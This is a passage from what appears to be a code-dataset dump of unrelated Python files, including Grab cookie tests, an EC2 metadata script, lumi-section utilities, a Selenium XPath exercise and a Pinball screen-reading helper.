grab.setup(reuse_cookies=True)\n self.server.add_response(Response(headers=[(\"Set-Cookie\", \"foo=bar\")]))\n grab.go(self.server.get_url())\n self.assertEqual(grab.doc.cookies[\"foo\"], \"bar\")\n grab.clear_cookies()\n self.server.add_response(Response())\n grab.go(self.server.get_url())\n self.assertTrue(len(self.server.request.cookies) == 0)\n\n def test_redirect_session(self):\n grab = build_grab()\n self.server.add_response(Response(headers=[(\"Set-Cookie\", \"foo=bar\")]))\n grab.go(self.server.get_url())\n self.assertEqual(grab.doc.cookies[\"foo\"], \"bar\")\n\n # Setup one-time redirect\n grab = build_grab()\n self.server.add_response(\n Response(\n headers=[\n (\"Location\", self.server.get_url()),\n (\"Set-Cookie\", \"foo=bar\"),\n ],\n status=302,\n )\n )\n self.server.add_response(Response())\n grab.go(self.server.get_url())\n self.assertEqual(self.server.request.cookies[\"foo\"].value, \"bar\")\n\n def test_load_dump(self):\n with temp_file() as tmp_file:\n self.server.add_response(Response())\n grab = build_grab()\n cookies = {\"foo\": \"bar\", \"spam\": \"ham\"}\n grab.setup(cookies=cookies)\n grab.go(self.server.get_url())\n grab.cookies.save_to_file(tmp_file)\n with open(tmp_file, encoding=\"utf-8\") as inp:\n self.assertEqual(\n set(cookies.items()),\n set((x[\"name\"], x[\"value\"]) for x in json.load(inp)),\n )\n\n self.server.add_response(Response())\n grab = build_grab()\n cookies = {\"foo\": \"bar\", \"spam\": \"begemot\"}\n grab.setup(cookies=cookies)\n grab.go(self.server.get_url())\n grab.cookies.save_to_file(tmp_file)\n with open(tmp_file, encoding=\"utf-8\") as inp:\n self.assertEqual(\n set(cookies.items()),\n set((x[\"name\"], x[\"value\"]) for x in json.load(inp)),\n )\n\n # Test load cookies\n grab = build_grab()\n cookies = [\n {\"name\": \"foo\", \"value\": \"bar\", \"domain\": self.server.address},\n {\"name\": \"spam\", \"value\": \"begemot\", \"domain\": self.server.address},\n ]\n with open(tmp_file, \"w\", encoding=\"utf-8\") as out:\n json.dump(cookies, out)\n grab.cookies.load_from_file(tmp_file)\n self.assertEqual(\n set(grab.cookies.items()), set((x[\"name\"], x[\"value\"]) for x in cookies)\n )\n\n def test_cookiefile_empty(self):\n with temp_file() as tmp_file:\n self.server.add_response(Response())\n grab = build_grab()\n # Empty file should not raise Exception\n with open(tmp_file, \"w\", encoding=\"utf-8\") as out:\n out.write(\"\")\n grab.setup(cookiefile=tmp_file)\n grab.go(self.server.get_url())\n\n def test_cookiefile(self):\n with temp_file() as tmp_file:\n grab = build_grab()\n\n cookies = [{\"name\": \"spam\", \"value\": \"ham\", \"domain\": self.server.address}]\n with open(tmp_file, \"w\", encoding=\"utf-8\") as out:\n json.dump(cookies, out)\n\n # One cookie are sent in server response\n # Another cookies is passed via the `cookiefile` option\n self.server.add_response(\n Response(headers=[(\"Set-Cookie\", \"godzilla=monkey\")])\n )\n grab.setup(cookiefile=tmp_file, debug=True)\n grab.go(self.server.get_url())\n self.assertEqual(self.server.request.cookies[\"spam\"].value, \"ham\")\n\n # This is correct reslt of combining two cookies\n merged_cookies = [(\"godzilla\", \"monkey\"), (\"spam\", \"ham\")]\n\n # grab.cookies should contains merged cookies\n self.assertEqual(set(merged_cookies), set(grab.cookies.items()))\n\n # `cookiefile` file should contains merged cookies\n with open(tmp_file, encoding=\"utf-8\") as inp:\n self.assertEqual(\n set(merged_cookies),\n set((x[\"name\"], x[\"value\"]) for x in json.load(inp)),\n )\n\n # Just ensure it works\n self.server.add_response(Response())\n grab.go(self.server.get_url())\n\n # def test_manual_dns(self):\n # grab = build_grab()\n # USE CUSTOM DNS: [\"foo:%d:127.0.0.1\" % self.server.port]\n # self.server.add_response(Response(data=b\"zzz\"))\n # grab.go(\"http://foo:%d/\" % self.server.port)\n # self.assertEqual(b\"zzz\", grab.doc.body)\n\n # def test_different_domains(self):\n # grab = build_grab()\n # names = [\n # \"foo:%d:127.0.0.1\" % self.server.port,\n # \"bar:%d:127.0.0.1\" % self.server.port,\n # ]\n # grab.setup_transport()\n # USE CUSTOM DNS\n\n # self.server.add_response(Response(headers=[(\"Set-Cookie\", \"foo=foo\")]))\n # grab.go(\"http://foo:%d\" % self.server.port)\n # self.assertEqual(dict(grab.doc.cookies.items()), {\"foo\": \"foo\"})\n\n # self.server.add_response(Response(headers=[(\"Set-Cookie\", \"bar=bar\")]))\n # grab.go(\"http://bar:%d\" % self.server.port)\n # self.assertEqual(dict(grab.doc.cookies.items()), {\"bar\": \"bar\"})\n\n # # That does not hold anymore, I guess I have fixed it\n # # # response.cookies contains cookies from both domains\n # # # because it just accumulates cookies over time\n # # # self.assertEqual(\n # # # dict(grab.doc.cookies.items()), {\"foo\": \"foo\", \"bar\": \"bar\"}\n # # # )\n\n # def test_cookie_domain(self):\n # grab = build_grab()\n # USE CUSTOM NAMES: \"example.com:%d:127.0.0.1\" % self.server.port,\n # grab.cookies.set(\"foo\", \"bar\", domain=\"example.com\")\n # grab.go(\"http://example.com:%d/\" % self.server.port)\n\n def test_update_invalid_cookie(self):\n grab = build_grab()\n self.assertRaises(GrabMisuseError, grab.cookies.update, None)\n self.assertRaises(GrabMisuseError, grab.cookies.update, \"asdf\")\n self.assertRaises(GrabMisuseError, grab.cookies.update, [\"asdf\"])\n\n def test_from_cookie_list(self):\n cookie = create_cookie(\"foo\", \"bar\", self.server.address)\n mgr = CookieManager.from_cookie_list([cookie])\n test_cookie = [x for x in mgr.cookiejar if x.name == \"foo\"][0]\n self.assertEqual(cookie.name, test_cookie.name)\n\n mgr = CookieManager.from_cookie_list([])\n self.assertEqual(0, len(list(mgr.cookiejar)))\n\n def test_pickle_serialization(self):\n cookie = create_cookie(\"foo\", \"bar\", self.server.address)\n mgr = CookieManager.from_cookie_list([cookie])\n dump = pickle.dumps(mgr)\n mgr2 = pickle.loads(dump)\n self.assertEqual(list(mgr.cookiejar)[0].value, list(mgr2.cookiejar)[0].value)\n\n def test_get_item(self):\n cookie = create_cookie(\"foo\", \"bar\", self.server.address)\n mgr = CookieManager.from_cookie_list([cookie])\n self.assertEqual(\"bar\", mgr[\"foo\"])\n self.assertRaises(KeyError, lambda: mgr[\"zzz\"])\n\n # def test_dot_domain(self):\n # grab = build_grab(debug=True)\n # USE CUSTOM NAMES\n # \"foo.bar:%d:127.0.0.1\" % self.server.port,\n # \"www.foo.bar:%d:127.0.0.1\" % self.server.port,\n # ]\n # self.server.add_response(\n # Response(\n # headers=[\n # (\n # \"Set-Cookie\",\n # (\n # \"foo=foo; Domain=.foo.bar;\"\n # \" Expires=Wed, 13 Jan 3000 22:23:01 GMT;\"\n # ),\n # )\n # ]\n # ),\n # count=2,\n # )\n\n # grab.go(\"http://www.foo.bar:%d\" % self.server.port)\n # self.assertEqual(dict(grab.doc.cookies.items()), {\"foo\": \"foo\"})\n # pprint(grab.doc.cookies.get_dict())\n\n # grab.go(\"http://www.foo.bar:%d\" % self.server.port)\n # pprint(self.server.request)\n # self.assertEqual(\"foo\", self.server.request.cookies.get(\"foo\").value)\n\n def test_path(self):\n self.server.add_response(\n Response(\n headers=[\n (\"Set-Cookie\", \"foo=1; path=/;\"),\n (\"Set-Cookie\", \"bar=1; path=/admin;\"),\n ]\n )\n )\n\n # work with \"/\" path\n grab = build_grab()\n # get cookies\n grab.go(self.server.get_url(\"/\"))\n\n self.server.add_response(Response())\n # submit received cookies\n grab.go(self.server.get_url(\"/\"))\n self.assertEqual(1, len(self.server.request.cookies))\n\n self.server.add_response(Response())\n # work with \"/admin\" path\n grab.go(self.server.get_url(\"/admin/zz\"))\n self.assertEqual(2, len(self.server.request.cookies))\n\n # def test_common_case_www_domain(self):\n # grab = build_grab()\n # USE CUSTOM NAMES\n # \"www.foo.bar:%d:127.0.0.1\" % self.server.port,\n # ]\n # # Cookies are set for root domain (not for www subdomain)\n # self.server.add_response(\n # Response(\n # headers=[\n # (\"Set-Cookie\", \"foo=1; Domain=foo.bar;\"),\n # (\"Set-Cookie\", \"bar=2; Domain=.foo.bar;\"),\n # ]\n # )\n # )\n # self.server.add_response(Response())\n\n # # get cookies\n # grab.go(\"http://www.foo.bar:%d\" % self.server.port)\n # # submit cookies\n # grab.go(\"http://www.foo.bar:%d\" % self.server.port)\n # self.assertEqual(\"1\", (self.server.request.cookies.get(\"foo\").value))\n # self.assertEqual(\"2\", (self.server.request.cookies.get(\"bar\").value))\n\n def test_cookie_merging_replace_with_cookies_option(self):\n with temp_file() as tmp_file:\n self.server.add_response(Response())\n init_cookies = [\n {\"name\": \"foo\", \"value\": \"bar\", \"domain\": self.server.address}\n ]\n with open(tmp_file, \"w\", encoding=\"utf-8\") as out:\n json.dump(init_cookies, out)\n\n grab = build_grab(debug=True)\n grab.cookies.load_from_file(tmp_file)\n\n cookies = {\n \"foo\": \"bar2\",\n \"sex\": \"male\",\n }\n\n grab.setup(cookies=cookies)\n grab.go(self.server.get_url())\n self.assertEqual(2, len(self.server.get_request().cookies))\n\n def test_cookie_merging_replace(self):\n grab = build_grab()\n grab.cookies.set(\"foo\", \"bar\", \"localhost\")\n grab.cookies.set(\"foo\", \"bar2\", \"localhost\")\n self.assertEqual(1, len(grab.cookies.items()))\n\n # Empty domain as same as localhost because internally\n # localhost replaced with empty string\n grab.cookies.set(\"foo\", \"bar3\", \"\")\n self.assertEqual(1, len(grab.cookies.items()))\n\n grab.cookies.set(\"foo\", \"bar2\", domain=\"ya.ru\")\n self.assertEqual(2, len(grab.cookies.items()))\n\n def test_unicode_cookie(self):\n grab = build_grab()\n\n def callback():\n return b\"HTTP/1.0 200 OK\\nSet-Cookie: preved=%s\\n\\n\" % \"медвед\".encode(\n \"utf-8\"\n )\n\n self.server.add_response(Response(raw_callback=callback))\n self.server.add_response(Response())\n # request page and receive unicode cookie\n grab.go(self.server.get_url())\n # request page one more time, sending cookie\n # should not fail\n grab.go(self.server.get_url())\n # does not work yet, because test_server does not correctly\n # display request unicode cookies\n # self.assertEqual(\n # u'медвед', self.server.request['cookies']['preved']['value']\n # )\n\n # def test_get_cookie_header(self):\n # mgr = CookieManager()\n # req = Request(\"https://example.com\", headers={\"Cookie\": \"foo=bar\"})\n # self.assertEqual(\"foo=bar\", mgr.get_cookie_header(req))\n","repo_name":"AMetIR/grab","sub_path":"tests/grab_cookies.py","file_name":"grab_cookies.py","file_ext":"py","file_size_in_byte":14543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"7843888690","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\n\ndef histgram():\n hist = []\n freq = defaultdict(int)\n\n for line in open(\"line_freq.txt\"):\n line = line.strip().split(\"\\t\")\n if line != None:\n hist.append(int(line[1]))\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.hist(hist, bins = 100, range = (1, 200))\n\n plt.title('histgram')\n plt.xlabel(' Frequency ')\n plt.ylabel(' Number of types ')\n ax.set_xlim(1, 200)\n ax.set_ylim(0, 500)\n plt.savefig('plt_5_049.png')\n plt.show()\n\nif __name__ == '__main__':\n histgram()\n","repo_name":"ymattsun/Advanced-NLP","sub_path":"5_049_histgram.py","file_name":"5_049_histgram.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5710194068","text":"# Import required modules\nimport boto3\nimport argparse\nimport json\n\ndef get_running_instance_ids(ec2_client):\n \"\"\"\n Collects the instance id or id's based on the filter's provided.\n We can always change the filters based on our requirements.\n \"\"\"\n reservations = ec2_client.describe_instances(Filters=[\n {\n \"Name\": \"instance-state-name\",\n \"Values\": [\"running\"],\n }\n ]).get(\"Reservations\")\n\n \"\"\"\n Instances are associated with a reservation: >>> instances = reservations[0].instances >>> instances [Instance:i-00000000]\n \n \"\"\"\n\n instance_ids = []\n for reservation in reservations:\n for instance in reservation[\"Instances\"]:\n instance_ids.append(instance[\"InstanceId\"])\n return instance_ids\n\ndef print_instance_as_json(ec2_client, instance_ids, key):\n \"\"\"\n Prints the instance metadata in JSON format.\n \"\"\"\n reservations = ec2_client.describe_instances(InstanceIds=instance_ids).get(\"Reservations\")\n for reservation in reservations:\n for instance in reservation['Instances']:\n if key is None:\n print(json.dumps(reservation, indent=4, sort_keys=True, default = str))\n else:\n print(instance.get(key))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Output AWS Instance Metadata either as file or output value of a particular key provided')\n parser.add_argument('--key', type=str, help=\"Provide key you want the value for\")\n parser.add_argument('--instance', type=str, help=\"instance id\")\n parser.add_argument('--region', type=str, help=\"region\", default=\"us-east-1\")\n\n args = parser.parse_args()\n\n ec2_client = boto3.client(\"ec2\", region_name=args.region)\n\n if args.instance:\n instance_ids = [args.instance]\n else:\n instance_ids = get_running_instance_ids(ec2_client)\n\n print_instance_as_json(ec2_client, instance_ids, args.key)\n","repo_name":"crazytechie1990/KPMG_Interview","sub_path":"Challenge2/aws-ec2-meta.py","file_name":"aws-ec2-meta.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38682600067","text":"def makeint(x):\n\tif x.strip().upper() not in ['', 'MAX', 'MIN']:\n\t\treturn int(x)\n\n\ndef parseLumiFromJSON(data, select = ''):\n\truns = eval(data)\n\trr = map(makeint, select.split('-') + [''])[:2]\n\tfor run in map(int, runs.keys()):\n\t\tif (rr[0] and run < rr[0]) or (rr[1] and run > rr[1]):\n\t\t\tcontinue\n\t\tfor lumi in runs[str(run)]:\n\t\t\tyield ([run, lumi[0]], [run, lumi[1]])\n\n\ndef cmpLumi(a, b):\n\t(start_a_run, start_a_lumi) = a[0]\n\t(start_b_run, start_b_lumi) = b[0]\n\tif start_a_run == start_b_run:\n\t\treturn cmp(start_a_lumi, start_b_lumi)\n\treturn cmp(start_a_run, start_b_run)\n\n\ndef mergeLumi(rlrange):\n\t\"\"\" Merge consecutive lumi sections\n\t>>> mergeLumi([([1, 11], [1, 20]), ([1, 1], [1, 10]), ([1, 22], [1, 30])])\n\t[([1, 1], [1, 20]), ([1, 22], [1, 30])]\n\t>>> mergeLumi([([1, 1], [2, 2]), ([2, 3], [2, 10]), ([2, 11], [4, 30])])\n\t[([1, 1], [4, 30])]\n\t\"\"\"\n\trlrange = sorted(rlrange, cmpLumi)\n\ti = 0\n\twhile i < len(rlrange) - 1:\n\t\t(end_run, end_lumi) = rlrange[i][1]\n\t\t(start_next_run, start_next_lumi) = rlrange[i+1][0]\n\t\tif (end_run == start_next_run) and (end_lumi == start_next_lumi - 1):\n\t\t\trlrange[i] = (rlrange[i][0], rlrange[i + 1][1])\n\t\t\tdel rlrange[i+1]\n\t\telse:\n\t\t\ti += 1\n\treturn rlrange\n\n\ndef parseLumiFromString(rlrange):\n\t\"\"\" Parse user supplied lumi info into easier to handle format\n\t>>> map(parseLumiFromString, ['1', '1-', '-1', '1-2'])\n\t[([1, None], [1, None]), ([1, None], [None, None]), ([None, None], [1, None]), ([1, None], [2, None])]\n\t>>> map(parseLumiFromString, ['1:5', '1:5-', '-1:5', '1:5-2:6'])\n\t[([1, 5], [1, 5]), ([1, 5], [None, None]), ([None, None], [1, 5]), ([1, 5], [2, 6])]\n\t>>> map(parseLumiFromString, ['1-:5', ':5-1', ':5-:6'])\n\t[([1, None], [None, 5]), ([None, 5], [1, None]), ([None, 5], [None, 6])]\n\t>>> map(parseLumiFromString, ['1:5-2', '1-2:5'])\n\t[([1, 5], [2, None]), ([1, None], [2, 5])]\n\t\"\"\"\n\tdef parseRunLumi(rl):\n\t\tif ':' in rl:\n\t\t\treturn map(makeint, rl.split(':'))\n\t\telse:\n\t\t\treturn [makeint(rl), None]\n\tif '-' in rlrange:\n\t\treturn tuple(map(parseRunLumi, rlrange.split('-')))\n\telse:\n\t\ttmp = parseRunLumi(rlrange)\n\t\treturn (tmp, tmp)\n\n\ndef parseLumiFilter(lumiexpr):\n\tif lumiexpr == '':\n\t\treturn None\n\n\tlumis = []\n\timport os, grid_control\n\tfor token in map(str.strip, lumiexpr.split(',')):\n\t\ttoken = map(str.strip, token.split('|'))\n\t\tif os.path.exists(token[0]):\n\t\t\ttry:\n\t\t\t\tif len(token) == 1:\n\t\t\t\t\ttoken.append('')\n\t\t\t\tlumis.extend(parseLumiFromJSON(open(token[0]).read(), token[1]))\n\t\t\texcept:\n\t\t\t\traise grid_control.ConfigError('Could not process lumi filter file:\\n%s' % token)\n\t\telse:\n\t\t\ttry:\n\t\t\t\tlumis.append(parseLumiFromString(token[0]))\n\t\t\texcept:\n\t\t\t\traise grid_control.ConfigError('Could not process lumi filter expression:\\n%s' % token[0])\n\treturn mergeLumi(lumis)\n\n\ndef filterLumiFilter(runs, lumifilter):\n\t\"\"\" Check if lumifilter selects the given run/lumi\n\t>>> formatLumi(filterLumiFilter([2,3,6], [([1, None], [2, None]), ([4, 1], [4, None]), ([5, 1], [None,3])]))\n\t['1:MIN-2:MAX', '5:1-9999999:3']\n\t>>> formatLumi(filterLumiFilter([2,3,6], [([1, 1], [2, 2]), ([3, 1], [5, 2]), ([5, 2], [7,3])]))\n\t['1:1-2:2', '3:1-5:2', '5:2-7:3']\n\t\"\"\"\n\tfor filterEntry in lumifilter:\n\t\t(sel_start, sel_end) = (filterEntry[0][0], filterEntry[1][0])\n\t\tfor run in runs:\n\t\t\tif (sel_start == None) or (run >= sel_start):\n\t\t\t\tif (sel_end == None) or (run <= sel_end):\n\t\t\t\t\tyield filterEntry\n\n\ndef selectLumi(run_lumi, lumifilter):\n\t\"\"\" Check if lumifilter selects the given run/lumi\n\t>>> selectLumi((1,2), [([1, None], [2, None])])\n\tTrue\n\t>>> selectLumi((1,2), [([1, 3], [5, 12])])\n\tFalse\n\t>>> selectLumi((2,1), [([1, 3], [5, 12])])\n\tTrue\n\t>>> selectLumi((9,2), [([3, 23], [None, None])])\n\tTrue\n\t\"\"\"\n\t(run, lumi) = run_lumi\n\tfor (sel_start, sel_end) in lumifilter:\n\t\t(sel_start_run, sel_start_lumi) = sel_start\n\t\t(sel_end_run, sel_end_lumi) = sel_end\n\t\tif (sel_start_run == None) or (run >= sel_start_run):\n\t\t\tif (sel_end_run == None) or (run <= sel_end_run):\n\t\t\t\t# At this point, run_lumi is contained in the selected run\n\t\t\t\tif (sel_start_run != None) and (run > sel_start_run):\n\t\t\t\t\tsel_start_lumi = None\n\t\t\t\tif (sel_start_lumi == None) or (lumi >= sel_start_lumi):\n\t\t\t\t\tif (sel_end_run != None) and (run < sel_end_run):\n\t\t\t\t\t\tsel_end_lumi = None\n\t\t\t\t\tif (sel_end_lumi == None) or (lumi <= sel_end_lumi):\n\t\t\t\t\t\treturn True\n\treturn False\n\n\ndef formatLumi(lumifilter):\n\t\"\"\" Check if lumifilter selects the given run/lumi\n\t>>> formatLumi(map(parseLumiFromString, ['1', '1-', '-1', '1-2']))\n\t['1:MIN-1:MAX', '1:MIN-9999999:MAX', '1:MIN-1:MAX', '1:MIN-2:MAX']\n\t>>> formatLumi(map(parseLumiFromString, ['1:5', '1:5-', '-1:5', '1:5-2:6']))\n\t['1:5-1:5', '1:5-9999999:MAX', '1:MIN-1:5', '1:5-2:6']\n\t>>> formatLumi(map(parseLumiFromString, ['1-:5', ':5-1', ':5-:6']))\n\t['1:MIN-9999999:5', '1:5-1:MAX', '1:5-9999999:6']\n\t>>> formatLumi(map(parseLumiFromString, ['1:5-2', '1-2:5']))\n\t['1:5-2:MAX', '1:MIN-2:5']\n\t\"\"\"\n\tdef formatRange(rlrange):\n\t\t(start, end) = rlrange\n\t\tdefault = lambda x, d: (x, d)[x == None]\n\t\tstart = [default(start[0], '1'), default(start[1], 'MIN')]\n\t\tend = [default(end[0], '9999999'), default(end[1], 'MAX')]\n\t\treturn str.join('-', map(lambda x: '%s:%s' % tuple(x), (start, end)))\n\tif lumifilter:\n\t\treturn map(formatRange, lumifilter)\n\treturn ''\n\n\nif __name__ == '__main__':\n\timport doctest\n\tdoctest.testmod()\n","repo_name":"mortenpi/grid-control","sub_path":"grid-control/packages/grid_control_cms/lumi_tools.py","file_name":"lumi_tools.py","file_ext":"py","file_size_in_byte":5270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7425359513","text":"import pytest\nimport numpy as np\nimport pandas as pd\n\nimport pyximport\n\npyximport.install(setup_args={\"include_dirs\": np.get_include()})\n\nfrom toad.cli import get_parser\n\ndef disable_stdout(fn):\n\n def wrapper(*args):\n import os\n import sys\n\n with open(os.devnull, 'w') as f:\n so = sys.stdout\n sys.stdout = f\n\n fn(*args)\n\n sys.stdout = so\n\n return wrapper\n\n\nparser = get_parser()\n\n\n\n@disable_stdout\ndef test_detect():\n args = parser.parse_args(['detect', '-i', 'tests/test_data.csv'])\n rep = args.func(args)\n assert rep.loc['E', 'unique'] == 20\n\n@pytest.mark.skip(\"tree command will generate a pic in travis-ci log\")\n@disable_stdout\ndef test_tree():\n args = parser.parse_args(['tree', '-i', 'tests/test_data.csv'])\n args.func(args)\n pass\n","repo_name":"amphibian-dev/toad","sub_path":"toad/cli_test.py","file_name":"cli_test.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":431,"dataset":"github-code","pt":"75"} +{"seq_id":"25717886746","text":"#1.Realative X-Path:\r\n#//a href[@class=\"btn-orange trial-btn pulse\"]\r\n#2.Absolute X-Path:\r\n#/html/body/nav/div/div[1]/a/img\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.service import Service\r\nfrom selenium.webdriver.common.by import By\r\nserv_obj=Service(\"C:/Browser drivers/chromedriver_win32/chromedriver.exe\")\r\ndriver=webdriver.Chrome(service=serv_obj)\r\ndriver.get(\"http://automationpractice.com/index.php\")\r\ndriver.maximize_window()\r\n#ABSOLUTE XPATH:\r\n'''driver.find_element(By.XPATH,\"/html/body/div/div[1]/header/div[3]/div/div/div[2]/form/input[4]\").send_keys(\"Mens Tshirts\")\r\ndriver.find_element(By.XPATH,\"/html/body/div/div[1]/header/div[3]/div/div/div[2]/form/button\").click()\r\ndriver.close()'''\r\n#RELATIVE XPATH:\r\n'''driver.find_element(By.XPATH,\"//*[@id='search_query_top']\").send_keys(\"TSHIRT\")\r\ndriver.find_element(By.XPATH,\"//*[@id='searchbox']/button\").click()\r\ndriver.close()'''\r\n#OPTION OF XPATH\r\n#1.X-PATH WITH OR:(Atleat one path is crct it is working)\r\n'''driver.find_element(By.XPATH,\"//input[@id='search_query_top' or @name='search_query']\" ).send_keys(\"tshirts\")\r\ndriver.find_element(By.XPATH,\".//button[@name='submit_search' or @type='submit']\").click()'''\r\n#2.X-PATH WITH AND:(Both should be crct)\r\n'''driver.find_element(By.XPATH,\"//input[@id='search_query_top' and @name='search_query']\" ).send_keys(\"tshirts\")\r\ndriver.find_element(By.XPATH,\".//button[@name='submit_search' and @type='submit']\").click()'''\r\n#3.X-PATH WITH CONTAINS(Find the common thing in value):\r\ndriver.find_element(By.XPATH,\"//input[contains(@id,'search')]\").send_keys(\"Printed Chiffon Dress\");\r\ndriver.find_element(By.XPATH,\"//button[contains(@name,'submit_sea')]\").click()\r\ndriver.close()\r\n#4 X-PATH WITH Starts-with(Starting letters of value sholud be same in that place we use)\r\n'''driver.find_element(By.XPATH,\"//a[text()='women']\").click()'''","repo_name":"Aravindhankarthikeyan/Selenium","sub_path":"Day 2/XPATH.py","file_name":"XPATH.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4681158778","text":"from mss import mss\nimport cv2 as cv\nimport numpy as np\nimport time\nimport pyautogui\nimport pywinauto\nfrom pywinauto import mouse\nfrom Pattern import Number, Words\n\nclass Frames(object):\n def __init__(self):\n self.sct = mss()\n self.lastFrame = None\n self.x = 0\n self.y = 0\n self.v_x = 0\n self.v_y = 0\n self.last_x = 0\n self.last_y = 0\n self.score = 0\n \n self.frame = None\n self.monitor = None\n self.WindowSize = (640, 480)\n \n self.Number_fun = Number()\n self.Words_fun = Words()\n \n def oneFrame(self):\n img, monitor = self.getFrame()\n img = self.getBallContous()\n self.score = self.recScore()\n # if score > self.score: \n # self.score = score\n stage = self.stageChange()\n return img, self.x/monitor['width'], self.y/monitor['height'], self.v_x/monitor['width'], self.v_y/monitor['height'], self.score, stage\n \n def getWindowCoord(self):\n # find the game window\n hwnd = pywinauto.findwindows.find_windows(title='3D Pinball for Windows - Space Cadet')[0]\n # get the game window\n self.gameWindow = pywinauto.application.Application().connect(handle=hwnd)\n # get the game window coordinates\n coordinates = self.gameWindow.window(handle=hwnd).rectangle()\n # change it into a dictionary\n coordinates = {'top': coordinates.top, 'left': coordinates.left, 'width': coordinates.width(), 'height': coordinates.height()}\n # print(coordinates)\n self.monitor = coordinates\n return coordinates\n \n def getFrame(self):\n monitor = self.getWindowCoord()\n # grab the screen\n sct_img = self.sct.grab(monitor)\n # convert to numpy array\n img = np.array(sct_img)\n img = cv.cvtColor(img, cv.COLOR_BGRA2BGR)\n \n # get the inside of the game window\n grey = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n contours, hierarchy = cv.findContours(grey, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n # select contours area > 50\n contours = [c for c in contours if cv.contourArea(c) > 50]\n # if width > height\n if len(contours) > 4:\n # sort the contours by y\n contours = sorted(contours, key=lambda x: cv.boundingRect(x)[1])\n\n if monitor['width'] / monitor['height'] > 640/480:\n x, y, w, h = cv.boundingRect(contours[1])\n top = y\n bottom = y + h\n \n x, y, w, h = cv.boundingRect(contours[3])\n right = x + w\n \n x, y, w, h = cv.boundingRect(contours[2])\n left = x + w - int((bottom - top) * 0.17)\n \n if right - left > 0 and bottom - top > 0:\n img = img[top:bottom, left:right]\n else:\n x, y, w, h = cv.boundingRect(contours[3])\n right = x + w\n \n x, y, w, h = cv.boundingRect(contours[2])\n left = x\n top = y\n bottom = y + h\n \n if right - left > 0 and bottom - top > 0:\n img = img[top:bottom, left:right]\n \n # resize the image\n img = cv.resize(img, self.WindowSize)\n self.frame = img\n return img, monitor\n \n def getBallContous(self):\n img = self.frame\n # add mask to find the ball\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n lower = (0, 0, 80)\n upper = (5, 5, 100)\n mask = cv.inRange(hsv, lower, upper)\n result = cv.bitwise_and(img, img, mask=mask)\n # convert to grayscale\n result = cv.cvtColor(result, cv.COLOR_BGR2GRAY)\n\n # find the changes\n if self.lastFrame is None:\n self.lastFrame = result\n self.x = 0\n self.y = 0\n self.v_x = 0\n self.v_y = 0\n self.last_x = 0\n self.last_y = 0\n else:\n changes = cv.absdiff(self.lastFrame, result)\n self.lastFrame = result\n # find the contours\n contours, hierarchy = cv.findContours(changes, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE) \n # draw the contours\n cv.drawContours(img, contours, -1, (0, 255, 0), 3)\n \n if len(contours) == 0:\n self.x = 0\n self.y = 0\n self.v_x = 0\n self.v_y = 0\n else:\n self.y = cv.boundingRect(contours[0])[1]\n for c in contours:\n x, y, w, h = cv.boundingRect(c)\n if y <= self.y:\n self.x = x + (w // 2)\n self.y = y - (h // 2)\n \n self.v_x = self.x - self.last_x\n self.v_y = self.y - self.last_y\n self.last_x = self.x\n self.last_y = self.y\n # draw the rectangle\n cv.rectangle(img, (self.x - 10, self.y), (self.x + 10, self.y + 20), (0, 0, 255), 2)\n # draw the velocity vector\n cv.arrowedLine(img, (self.x, self.y), (self.x + self.v_x, self.y + self.v_y), (255, 0, 0), 2)\n return img\n\n\n def recScore(self):\n # find all the numbers\n img = self.frame\n (x, y, w, h) = (482, 229, 136, 23)\n # cv.rectangle(img, (x, y), (x + w, y + h), (0, 255, 255), 2)\n length_of_number = 15\n space = [4,5,7,8,10,10,12,14]\n score = 0\n for i in range(8):\n number_img = img[y:y + h, x + (length_of_number) * i + space[i] :x + (length_of_number ) * i + length_of_number + space[i]]\n digit = self.Number_fun.compare(number_img)\n cv.rectangle(img, (x + (length_of_number) * i + space[i], y), (x + (length_of_number ) * i + length_of_number + space[i], y + h), (0, 255, 255), 1)\n score = score * 10 + digit\n\n # draw the score \n cv.putText(img, str(score), (x, y - 5), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n return score\n \n def stageChange(self):\n img = self.frame\n stage = self.Words_fun.compare(img)\n if stage > 0:\n print(\"stage: \", stage)\n return stage\n\n def findCancel(self):\n locs = self.Words_fun.findCancel(self.frame)\n \n # change locs in img to locs in monitor \n left = self.monitor['left']\n top = self.monitor['top']\n width = self.monitor['width']\n height = self.monitor['height']\n \n width_ratio = width / self.WindowSize[0]\n height_ratio = height / self.WindowSize[1]\n \n # for loc in locs:\n # x = left + int(loc[0] * width_ratio)\n # y = top + int(loc[1] * height_ratio)\n # mouse.click(button='left', coords=(x, y))\n # print(\"click\",loc[0], loc[1], x, y)\n # time.sleep(0.1)\n \n \n for i in range(left, left + 50, 10):\n for j in range(top + height - 50, top + height, 10):\n print(i, j)\n mouse.click(button='left', coords=(i, j))\n # time.sleep(0.01)\n \n ","repo_name":"linan1109/SpaceCadetPinball-AIplayer","sub_path":"Frame.py","file_name":"Frame.py","file_ext":"py","file_size_in_byte":7314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7855350630","text":"from sys import exit\nimport pandas as pd\nimport numpy as np\nfrom tensorflow.keras.utils import timeseries_dataset_from_array\n\npath = '/Users/nickeisenberg/GitRepos/Kaggle/Jena_Climate/DataSet/jena_climate_2009_2016_.csv'\n\ndf = 